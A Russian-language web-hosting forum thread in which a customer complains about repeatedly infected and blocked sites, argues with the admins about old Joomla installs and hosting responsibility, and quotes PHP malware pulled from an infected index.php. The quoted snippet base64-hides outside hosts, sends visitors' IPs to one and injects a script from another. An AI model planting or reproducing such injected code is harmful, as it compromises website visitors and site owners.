И еще 2 сайта упало :)

Вопросы о том как и что сделать чтобы работало
Правила форума
1. Один вопрос - одна тема. Не надо задавать в той же теме другие вопросы.
2. Не пишите в чужих темах, если ваша проблема не имеет отношения к обсуждаемой.
3. Давайте полное описание проблемы - имя сайта, имя сервера, учётная запись, способ воспроизведения, скриншот ошибки.
4. Пароли выкладывать в форум - НЕ НАДО
Ответить
Алексей

И еще 2 сайта упало :)

Сообщение Алексей »

Опять 2 сайта упало .. на этот раз вирус прописался в index.php ... 2 сайта еще не поймали эту заразу
с одного удалось кусок вырвать

Код: Выделить всё

function collectnewss() {

		if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
		$ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
		$file = @fopen ($get, "r");
		$content = @fread($file, 1000);
		@setcookie("iJijkdaMnerys", $value, time()+3600*24);
		if (!$content)
			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9wYWtlc3JyeS5pbmZvL3JzaXplLmpzIj48L3NjcmlwdD4=");
		else 
			echo $content;

		}
}
collectnewss ();
с другого не удалось .. антивирусник ругался и топал ногами ...
у вас после НГ прям ажиотаж наездов на хостинг... до нового года поспокойнее было ...
в этом году уже раз 10 точно востанавливал сайты ..
Последний раз редактировалось lissyara 2013-05-02, 14:39:07, всего редактировалось 1 раз.
Причина: Товарищщи, цените чужое время, юзайте кнопочку [code] ...
lissyara
Site Admin
Сообщения: 6450
Зарегистрирован: 2009-09-19, 22:04:41

Re: И еще 2 сайта упало :)

Сообщение lissyara »

а не проще один раз обновить все движки, пролечить СВОЙ комп, сменить все пароли...
и потом год или два даже не дёргаться по таким вопрсоам?
Убей их всех! Бог потом рассортирует...
Алексей

Re: И еще 2 сайта упало :)

Сообщение Алексей »

lissyara писал(а):а не проще один раз обновить все движки, пролечить СВОЙ комп, сменить все пароли...
и потом год или два даже не дёргаться по таким вопрсоам?
ну давай заново ... пароли менял, движки обновил как возможно, там один сайт на joomla 1,5 , и ничего с ним уже не сделать ... что то еще ? :)
lissyara
Site Admin
Сообщения: 6450
Зарегистрирован: 2009-09-19, 22:04:41

Re: И еще 2 сайта упало :)

Сообщение lissyara »

ждать неделю, через неделю вас снова залочит - через дырки вирусов наимплантируют...
развлекайтесь, пока вам не надоест - банит-то робот, ему точно не надоест.
Убей их всех! Бог потом рассортирует...
Алексей

Re: И еще 2 сайта упало :)

Сообщение Алексей »

lissyara писал(а):ждать неделю, через неделю вас снова залочит - через дырки вирусов наимплантируют...
развлекайтесь, пока вам не надоест - банит-то робот, ему точно не надоест.
почему у других хостеров все ОК с этим ?.. сделал сайт и забыл про него ! там старая joomla 1.5 и нет забот... просто не буду я больше никому ваш хост советовать и все.. я конечно погоды для вас не делаю, но все равно камень в ваш огород ... и не нада все время про дыры в кмс, да они есть, но еслиб все одинаково свой хост строжили то либо у всех вирусов не было бы, либо наоборот у всех были, а как показывает практика, у вас они проявлятся а в другом месте нет... (это я про свои сайты только говорю)
lissyara
Site Admin
Сообщения: 6450
Зарегистрирован: 2009-09-19, 22:04:41

Re: И еще 2 сайта упало :)

Сообщение lissyara »

потому что остальным хостерам плевать на клиентов
из-за одного клиента со старым дырявым движком проблемы у остальных на сервере - от неухода почты, до бана IP апстримом
Убей их всех! Бог потом рассортирует...
Алексей

Re: И еще 2 сайта упало :)

Сообщение Алексей »

lissyara писал(а):потому что остальным хостерам плевать на клиентов
из-за одного клиента со старым дырявым движком проблемы у остальных на сервере - от неухода почты, до бана IP апстримом
Из-за того что остальным хостерам плевать на клиентов, от этого у клиента на тех хостах все работает ?? бред несете ...
lissyara
Site Admin
Сообщения: 6450
Зарегистрирован: 2009-09-19, 22:04:41

Re: И еще 2 сайта упало :)

Сообщение lissyara »

то что вы не понимаете обратную сторону хостинга - не значит что вы тут самый умный =))
Убей их всех! Бог потом рассортирует...
Аватара пользователя
adre
Сообщения: 1351
Зарегистрирован: 2010-04-29, 16:27:01
Контактная информация:

Re: И еще 2 сайта упало :)

Сообщение adre »

Алексей писал(а):
lissyara писал(а):потому что остальным хостерам плевать на клиентов
из-за одного клиента со старым дырявым движком проблемы у остальных на сервере - от неухода почты, до бана IP апстримом
Из-за того что остальным хостерам плевать на клиентов, от этого у клиента на тех хостах все работает ?? бред несете ...
у них не работает. у них просто идет потеря целевой аудитории, далее их сайт попадает в блек лист, далее банится уже антивирусами. далее идут жалбы на шаред IP далее клиента выносят с хоста либо он приобретает свой IP или VPS или DS или меняет хостера. много вариантов. смотрите жалобы на форуме поисковых систем. там часто пишут такое и не только.
Алексей

Re: И еще 2 сайта упало :)

Сообщение Алексей »

lissyara писал(а):то что вы не понимаете обратную сторону хостинга - не значит что вы тут самый умный =))
а я всегда думал что хостинг это не моя головная боль, а оказывается наоборот, я плачу деньги за хостинг и создаю себе тем самым головную боль .. занимательная наука...
Гость

Re: И еще 2 сайта упало :)

Сообщение Гость »

Опять сайт заблочили....опять какой то вирус...
че у вас происходит... не было в прошлом году таких проблем, с НГ просто завалилось все и вся.. че вы поменяли там у себя ???
Все достало... ставлю тестовый сайт на последней ОБНОВЛЕННОЙ Joomla 3... посмотрим стоит ли у вас вообще продолжать хоститься .. нафиг надо такое счастье если все время вирусы откуда то появляются и сайты блочат :evil:
Аватара пользователя
adre
Сообщения: 1351
Зарегистрирован: 2010-04-29, 16:27:01
Контактная информация:

Re: И еще 2 сайта упало :)

Сообщение adre »

Алексей писал(а):
lissyara писал(а):то что вы не понимаете обратную сторону хостинга - не значит что вы тут самый умный =))
а я всегда думал что хостинг это не моя головная боль, а оказывается наоборот, я плачу деньги за хостинг и создаю себе тем самым головную боль .. занимательная наука...
вы платите за ресурсы. а не то что на них расположено.
Алексей

Re: И еще 2 сайта упало :)

Сообщение Алексей »

adre писал(а):
Алексей писал(а):
lissyara писал(а):то что вы не понимаете обратную сторону хостинга - не значит что вы тут самый умный =))
а я всегда думал что хостинг это не моя головная боль, а оказывается наоборот, я плачу деньги за хостинг и создаю себе тем самым головную боль .. занимательная наука...
вы платите за ресурсы. а не то что на них расположено.
нафига мне такие ресурсы которые постоянно блокируют, за которое не отвечают и со всеми проблемами отправляют далеко ?
вы лучше скажите , чего у вас произошло с НГ ?? до НГ небыло таких проблем :evil:
Аватара пользователя
adre
Сообщения: 1351
Зарегистрирован: 2010-04-29, 16:27:01
Контактная информация:

Re: И еще 2 сайта упало :)

Сообщение adre »

политика партии, в следствии большого количества запросов от антивирусных компании, отдела К, ФСБ и пр.
Ответить